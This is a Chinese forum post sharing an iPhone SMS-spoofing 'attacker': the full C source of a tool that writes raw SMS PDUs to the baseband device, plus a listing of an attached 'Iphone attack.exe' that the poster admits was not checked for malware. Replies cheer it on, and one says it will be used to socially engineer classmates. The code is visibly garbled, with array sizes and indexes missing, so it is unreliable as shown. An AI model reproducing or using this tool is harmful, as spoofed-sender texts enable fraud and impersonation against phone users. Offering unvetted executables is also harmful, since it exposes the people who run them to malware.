iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件...
iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、iphone 伪装发件人攻击器
投稿来自:Tobe. <37783941@qq.com>,2012年08月28日(星期二) 下午 04:42。
警告:禁止利用文中提到的内容、原理、工具至非法用途,否则后果自负。
关于本漏洞详细内容请参考:iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号
main.c:
/*
sendrawpdu (c) 2012 pod2g
Command line tool, usage: sendrawpdu <PDU data in hex>
- Code based on iphone-elite's sendmodem ( http://code.google.com/p/iphone-elite/wiki/sendmodem )
- Just few modifications for SMS sending and iPhone 4 compatibility.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <termios.h>
#include <errno.h>
#include <time.h>
#include <sys/ioctl.h>
#define BUFSIZE (65536+100)
unsigned char readbuf;
static struct termios term;
static struct termios gOriginalTTYAttrs;
void sendCmd(int fd, void *buf, size_t size);
void sendStrCmd(int fd, char *buf);
int readResp(int fd);
int initConn(int speed);
void closeConn(int fd);
void sendAt(int fd);
void at(int fd);
void sendCmd(int fd, void *buf, size_t size) {
if(write(fd, buf, size) == -1) {
fprintf(stderr, "sendCmd error. %s\n", strerror(errno));
exit(1);
}
}
void sendStrCmd(int fd, char *buf) {
sendCmd(fd, buf, strlen(buf));
}
int readResp(int fd) {
int len = 0;
struct timeval timeout;
int nfds = fd + 1;
fd_set readfds;
int select_ret;
FD_ZERO(&readfds);
FD_SET(fd, &readfds);
// Wait a second
timeout.tv_sec = 1;
timeout.tv_usec = 500000;
while ((select_ret = select(nfds, &readfds, NULL, NULL, &timeout)) > 0) {
len += read(fd, readbuf + len, BUFSIZE - len);
FD_ZERO(&readfds);
FD_SET(fd, &readfds);
timeout.tv_sec = 0;
timeout.tv_usec = 500000;
}
if (len > 0) {
}
readbuf = 0;
fprintf(stderr,"%s",readbuf);
return len;
}
int initConn(int speed) {
int fd = open("/dev/dlci.spi-baseband.extra_0", O_RDWR | O_NOCTTY);
if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);
tcgetattr(fd, &term);
gOriginalTTYAttrs = term;
cfmakeraw(&term);
cfsetspeed(&term, speed);
term.c_cflag = CS8 | CLOCAL | CREAD;
term.c_iflag = 0;
term.c_oflag = 0;
term.c_lflag = 0;
term.c_cc = 0;
term.c_cc = 0;
tcsetattr(fd, TCSANOW, &term);
return fd;
}
void closeConn(int fd) {
tcdrain(fd);
tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs);
close(fd);
}
void sendAt(int fd) {
char cmd;
sprintf(cmd,"AT\r");
sendCmd(fd, cmd, strlen(cmd));
}
void at(int fd) {
sendAt(fd);
for (;;) {
if(readResp(fd) != 0) {
if(strstr((const char *)readbuf,"OK") != NULL) {
break;
}
}
sendAt(fd);
}
}
int main(int argc, char **argv) {
int fd;
char cmd;
if(argc < 2) {
fprintf(stderr,"usage: %s <pdu data>\n",argv);
exit(1);
}
fd = initConn(115200);
at(fd);
sendStrCmd(fd, "AT+CMGF=0\r");
readResp(fd);
sprintf(cmd, "AT+CMGS=%ld\r", strlen(argv)/2 - 1);
sendStrCmd(fd, cmd);
readResp(fd);
sprintf(cmd,"%s\032",argv);
sendStrCmd(fd, cmd);
readResp(fd);
closeConn(fd);
return 0;
}
附件下载:
**** Hidden Message *****
(是否有毒及真实性自测,时间仓促,本人没来得及检查……)
iPhone 短信欺骗漏洞攻击器、伪造短信号码工具 的目录
2012/08/2817:05 <DIR> .
2012/08/2817:05 <DIR> ..
2012/08/2816:37 393,728 Iphone attack.exe
2012/08/2816:39 3,292 main.c
2012/08/2816:39 221,412 附图.png
3 个文件 618,432 字节
2 个目录 13,856,100,352 可用字节 看看这工具 Good!感谢分享! 不错!! 值得回复 :lol拿去社工同学喽 顶顶!!!!!!!!!!!!1 值得一看啊
楼主牛逼 e 看看 大牛 不行是什么看看!